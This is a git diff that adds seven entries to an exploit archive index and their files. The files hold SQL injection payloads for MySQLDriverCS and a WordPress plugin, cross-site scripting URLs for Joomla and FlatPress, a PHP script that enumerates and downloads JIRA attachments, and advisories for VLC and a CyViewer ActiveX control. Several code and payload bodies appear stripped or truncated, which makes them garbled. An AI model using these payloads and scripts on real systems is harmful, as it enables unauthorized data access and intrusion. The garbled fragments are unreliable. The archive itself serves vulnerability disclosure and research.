diff --git a/files.csv b/files.csv
index 091dd870b..721b1243f 100755
--- a/files.csv
+++ b/files.csv
@@ -32327,3 +32327,10 @@ id,file,description,date,author,platform,type,port
 35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
 35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection Vulnerability",2011-06-27,Th3.xin0x,php,webapps,0
 35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x Multiple Cross Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0
+35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 SQL Injection Vulnerability",2011-06-27,"Qihan Luo",multiple,remote,0
+35893,platforms/php/webapps/35893.txt,"WordPress Pretty Link Lite Plugin 1.4.56 Multiple SQL Injection Vulnerabilities",2011-06-27,MaKyOtOx,php,webapps,0
+35894,platforms/php/webapps/35894.txt,"Joomla! CMS 1.6.3 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps,0
+35896,platforms/php/webapps/35896.txt,"FlatPress 0.1010.1 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0
+35897,platforms/windows/remote/35897.html,"CygniCon CyViewer ActiveX Control 'SaveData()' Insecure Method Vulnerability",2011-06-28,"High-Tech Bridge SA",windows,remote,0
+35898,platforms/multiple/remote/35898.php,"Atlassian JIRA <= 3.13.5 File Download Security Bypass Vulnerability",2011-06-28,"Ignacio Garrido",multiple,remote,0
+35902,platforms/windows/local/35902.txt,"VLC Player 2.1.5 - Write Access Violation Vulnerability",2015-01-26,"Veysel HATAS",windows,local,0
diff --git a/platforms/multiple/remote/35892.txt b/platforms/multiple/remote/35892.txt
new file mode 100755
index 000000000..ffa97dcd4
--- /dev/null
+++ b/platforms/multiple/remote/35892.txt
@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/48466/info
+
+MySQLDriverCS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+MySQLDriverCS 4.0.1 is vulnerable; other versions may also be affected.
+
+There is an example for illustrating the attack against the vulnerability:
+----------------------------------------------------------------------
+DataTable dt = new DataTable();
+MySQLConnection conn = new MySQLConnection(CONN_STRING);
+MySQLDataAdapter Cmd = new MySQLDataAdapter();
+string sCmdText = "SELECT * FROM filelist where FILENAME=@sFileName AND LANGUAGE=@sLanguage";
+Cmd.SelectCommand = new MySQLCommand(sCmdText, conn);
+Cmd.SelectCommand.Connection.Open();
+Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sFileName", SqlDbType.VarChar));
+Cmd.SelectCommand.Parameters["@sFileName"].Value = sFileName;
+Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sLanguage", SqlDbType.VarChar));
+Cmd.SelectCommand.Parameters["@sLanguage"].Value = sLanguage;
+Cmd.Fill(dt);
+Cmd.SelectCommand.Connection.Close();
+----------------------------------------------------------------------
+
+Assigning (one parameter is assigned with SQL injection attack vector, while another one is assigned with a string which contains the parameter name of the first.):
+----------------------------------------------------------------------
+@sFileName: " or 1=1 -- -"
+@sLanguage: "cn@sFileName"
+----------------------------------------------------------------------
+
+Then, the final sql query statement executed by Mysql is as following:
+----------------------------------------------------------------------
+SELECT * FROM filelist where FILENAME=' or 1=1 -- -' AND LANGUAGE='cn' or 1=1 -- -''
+---------------------------------------------------------------------- +Of course, we should use two parameters to launch a cross-parameter SQL injection attack. diff --git a/platforms/multiple/remote/35898.php b/platforms/multiple/remote/35898.php new file mode 100755 index 000000000..4939747e0 --- /dev/null +++ b/platforms/multiple/remote/35898.php @@ -0,0 +1,72 @@ +source: http://www.securityfocus.com/bid/48484/info + +Atlassian JIRA is prone to a security bypass vulnerability. + +An attacker can exploit this issue to download arbitrary attachment files within the context of the affected application. + += $argv[3]) +{ +echo "\n\n#The second number must be bigger than the first one\n"; +die; +} + +$numero = $argv[2]; + +for ($numero;$numero <= $argv[3];$numero++) +{ +$head = get_headers("$url$numero/"); + +if (substr ($head[0],9,3) == "404") +{ +echo "\n#File number $numero not found! (404)\n"; +} +else{ +$explodeo = explode("filename*=",$head[2]); +$explodeo2 = explode(";",$explodeo[1]); +$archivo = substr($explodeo2[0],7); + +echo "\n#Downloading file: $archivo\n"; +$file=file_get_contents("$url$numero/$archivo"); +file_put_contents($archivo,$file); + +} +} +echo "\n#All attachment downloaded correctly!\n"; +die; + +?> + diff --git a/platforms/php/webapps/35893.txt b/platforms/php/webapps/35893.txt new file mode 100755 index 000000000..781a04c5c --- /dev/null +++ b/platforms/php/webapps/35893.txt 
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/48469/info
+
+The 'Pretty Link Lite' plugin for WordPress is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Pretty Link Lite 1.4.56 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&group=-1union
+select @@version
+http://www.example.com.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1union
+select @@version
+http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-links.php&group=-1union
+select @@version
\ No newline at end of file
diff --git a/platforms/php/webapps/35894.txt b/platforms/php/webapps/35894.txt
new file mode 100755
index 000000000..8ac350ae6
--- /dev/null
+++ b/platforms/php/webapps/35894.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/48471/info
+
+Joomla! CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Joomla! CMS versions 1.6.3 and prior are vulnerable.
+
+http://www.example.com/joomla163_noseo/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";>
+http://www.example.com/joomla163_noseo/index.php?option=com_content&view=category&id=19&Itemid=260&limit=10&filter_order_Dir=&limitstart=&filter_order=>
+http://www.example.com/joomla163_noseo/index.php?option=com_newsfeeds&view=category&id=17&whateverehere=";>&Itemid=253&limit=10&filter_order_Dir=ASC&filter_order=ordering
+http://www.example.com/joomla163_noseo/index.php?option=";>&task=reset.request
\ No newline at end of file
diff --git a/platforms/php/webapps/35896.txt b/platforms/php/webapps/35896.txt
new file mode 100755
index 000000000..bcab304c6
--- /dev/null
+++ b/platforms/php/webapps/35896.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/48482/info
+
+FlatPress is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+FlatPress 0.1010.1 is vulnerable; other versions may also be affected.
+
+
+'> +'> +'> + +
\ No newline at end of file
diff --git a/platforms/windows/local/35902.txt b/platforms/windows/local/35902.txt
new file mode 100755
index 000000000..b22ea1547
--- /dev/null
+++ b/platforms/windows/local/35902.txt
@@ -0,0 +1,29 @@
+Title : VLC Player 2.1.5 Write Access Violation Vulnerability
+Discoverer: Veysel HATAS (@muh4f1z)
+Web page : www.binarysniper.net
+Vendor : VideoLAN VLC Project
+Test: Windows XP SP3
+Status: Fixed
+Severity : High
+
+CVE ID : CVE-2014-9598
+
+NIST: ?https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9598
+OSVDB ID : 116451
+VLC Ticket : 13390
+
+windbglog : windbglog.txt
+
+
+Discovered : 24 November 2014
+Reported : 26 December 2014
+Published : 9 January 2015
+
+Description : VLC Media Player contains a flaw that is triggered as
+user-supplied input is not properly sanitized when handling a specially crafted
+M2V file . This may allow a
+context-dependent attacker to corrupt memory and potentially execute
+arbitrary code.
+
+## EDB Mirror: http://www.exploit-db.com/spolits/35902-poc.m2v
+## EDB Mirror: http://www.exploit-db.com/spolits/35902-windbglog.txt
\ No newline at end of file
diff --git a/platforms/windows/remote/35897.html b/platforms/windows/remote/35897.html
new file mode 100755
index 000000000..e90e13af4
--- /dev/null
+++ b/platforms/windows/remote/35897.html
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/48483/info
+
+CygniCon CyViewer ActiveX control is prone to a vulnerability caused by an insecure method.
+
+Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges.
+
+
+
+
+
+
\ No newline at end of file